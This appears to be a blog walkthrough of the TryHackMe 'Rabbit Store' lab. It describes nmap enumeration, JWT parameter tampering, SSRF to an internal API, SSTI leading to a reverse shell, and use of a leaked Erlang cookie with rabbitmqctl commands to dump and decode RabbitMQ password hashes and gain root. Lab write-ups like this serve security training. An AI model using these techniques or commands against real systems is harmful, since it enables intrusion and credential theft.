TryHackMe Rabbit Store Walkthrough

Another Linux Lab Machine by TryHackMe , this lab is exploited via chaining multiple exploits to reach RCE …..

Name	Rabbit Store
Level	Medium
Technology	Linux
Points	60
Platform	Tryhackme

So Let’s Start

• First we connect with the VPN or use attack box

• Now , we start the machine

# Enumeration

---

• let’s first start with the nmap scan …

┌──(kali㉿kali)-[~/tryhackme]
└─$ nmap -sC -sV -p- 10.10.108.94 --min-rate=1500
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-05 11:48 EDT
Nmap scan report for cloudsite.thm (10.10.108.94)
Host is up (0.19s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
|_  256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
80/tcp    open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://cloudsite.thm/.
|_http-server-header: Apache/2.4.52 (Ubuntu)
4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672
25672/tcp open  unknown
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

• There are four Open Ports :
  • 22 (SSH)
  • 80 (HTTP)
  • 4369 (EPMD)
  • 25672 (Erlang Distribution)
• we need to add host IP (cloudsite.thm) to the /etc/hosts host file .

┌──(kali㉿kali)-[~/Downloads/tryhackme]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

10.10.108.94  cloudsite.thm

• i look at the source code of the page and found another sub domain name storage.cloudsite.thm and now lets add this to the

┌──(kali㉿kali)-[~/tryhackme]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

10.10.108.94  cloudsite.thm
10.10.108.94  storage.cloudsite.thm

# Creating an Account

• and visiting that page lead us to the login page where register functionality is also working .

• i register with the random account email and password

• and when i try to login i got a message quoted as ….

• then i analyzed both request in the burp requests section …

• and i found out that there is JWT token created to verify all this , and instant though goes thought mind to check this jwt token , and i got these details of my account on the jwt encoded token …

• and there is an extra parameter named "subscription":"inactive"

# Activating the Account

• and then i send another request through the registration page and intercept the request and modifies it with adding an extra parameter goes as "subscription":"active"

• and request got accepted and got message "User registered successfully"

• and after that when i login in to that acount i found out that , we are able to access to resource and it basically and upload functionality to upload file …..

• let’s see the technolgy it used using wapplyzer

• but there is a catch here that our file name doesn’t shoes up there , and when we access that file it starts downloading automatically and file names stored with a random hash value and that prompt to us as File Path after uploading file .

• then i struggle a little and just after it though of fuzzing the api parameters and guess what i found some additional paramters …

# Discovering the API Endpoints

┌──(kali㉿kali)-[~/tryhackme]
└─$ feroxbuster -u http://storage.cloudsite.thm/api/
                                                                            
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://storage.cloudsite.thm/api/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/register
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/login
401      GET        1l        3w       32c http://storage.cloudsite.thm/api/uploads
403      GET        1l        2w       27c http://storage.cloudsite.thm/api/docs
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/Login
401      GET        1l        3w       32c http://storage.cloudsite.thm/api/Uploads
403      GET        1l        2w       27c http://storage.cloudsite.thm/api/Docs
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/Register
403      GET        1l        2w       27c http://storage.cloudsite.thm/api/DOCS

• and when i visit the /api/docs parameter it says access denied ….

• then i do stupid mistake that there is another upload functionality on the same pageand forgot to scroll down the page .

• and here this upload functiolity work as upload through url and i test via uploading some file from the local python3 server and its working

• then i tried to upload the /api/docs to the server usign url as http://storage.cloudsite.thm/api/docs

• but when i tried to access this uploaded file i again access denied

• then itried with local host ip and it seems to work but something is missing

• when i try to access this i got The requested URL wasnot found on this server

• then i look in-to response and i found interesting header x-powered-by: Express and i notice this on the wapplyzer too ( took help from the internet source )
• then i made another request with addition of the poartnumber 3000 , and this time we got success

• and i got access to some hidden endpoints , the main was fetch_message_from_chatbot

• now i try to acces this parameter and it says GET method not allowed

• making a POST request with an empty json payload , we receive the messege "username parameter is required".

• now , we send a request with the username parameter using jason payload as {"username":"admin"}, and then we recieve a message that sorry admin , our chatbot server is currently under development

# SSTI –> RCE

• as our user suppied username payload reflect in response , now immidietlly i thing of the SSTI check , and it got successfull ….

• now we can try to use the SSTI to RCE payload , first we check if its workign or not .. and it intead workign

# Exploitation

---

• now we try yo get the RCE using this SSTI to RCE payload

• and we got reverse shell connection to the listner as azrael …..

• to get stable connection i setup ssh connection file for azreal user and copy the id_rsa to attack box …

• and using id_rsa file i got connection using ssh as azreal .

• now i start the python3 server for tranfering file to the server

• and using wget to download the file on the server for automated enumeration …

• from here i found some erlang cookie file having cookie value in it

• so , this is running Rabbitmq messaging server vonfirms via /etc/passwd file ….

• i search for this messaging server and found that it uses the port 4369 and we can even search for it …

• Using the Erlang Cookie, we can authenticate and communicate with the RabbitMQ node. Since RabbitMQ nodes have the format rabbit@<hostname> by default, we add the target’s hostname (forge) to the /etc/hosts file: ( took hint from internet source )

• for this we first need to install the rabbitmq-server

sudo apt install rabbitmq-server

• now we will use this command to communicate to the server and enumerating ..

sudo rabbitmqctl --erlang-cookie '<cookie-value>' --node rabbit@forge list_users

• Now we will dump the password hashes

sudo rabbitmqctl --erlang-cookie '<Your_erlang_cookie>' --node rabbit@forge export_definitions /tmp/conf.json

• according to the RabbitMQ documentation this should be the formate to decode it .. base64(<4 byte salt> + sha256(<4 byte salt> + <password>))
• now we will runthis command to convert it correctly …

echo -n <entire 49e hash above> | base64 -d | xxd -p -c 100

┌──(kali㉿kali)-[~/Downloads/tryhackme]
└─$ echo -n '49e6hSld<REDECTED>EOz9uxhSBHtGU+YBzWF' | base64 -d | xxd -p -c 100                          
e3d7ba85295d1d16a2617df6f7<Redacted>c43b3f6ec614811ed194f98073585

# Root Access

• now we will remove the 4-byte salt (e3d7ba85) form the beggining , now will left with the actual hash : 295d1d16a2617df6f7614811ed194f98073585
• using this password we can switch to the root user …

azrael@forge:~/.ssh$ su - root
su - root
Password: 295d1d16a<Redacted>>4811ed194f98073585

whoami
root
/root
-bash: line 3: /root: Is a directory
cat /root/root.txt
eabf7a0b05d3f2028<redacted>

# Final Thoughts

---

I hope this blog continues to be helpful in your learning journey!. If you find this blog helpful, I’d love to hear your thoughts — my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning!. You can contact me on Linkedin and Twitter
linkdin
Twitter
Machine Platform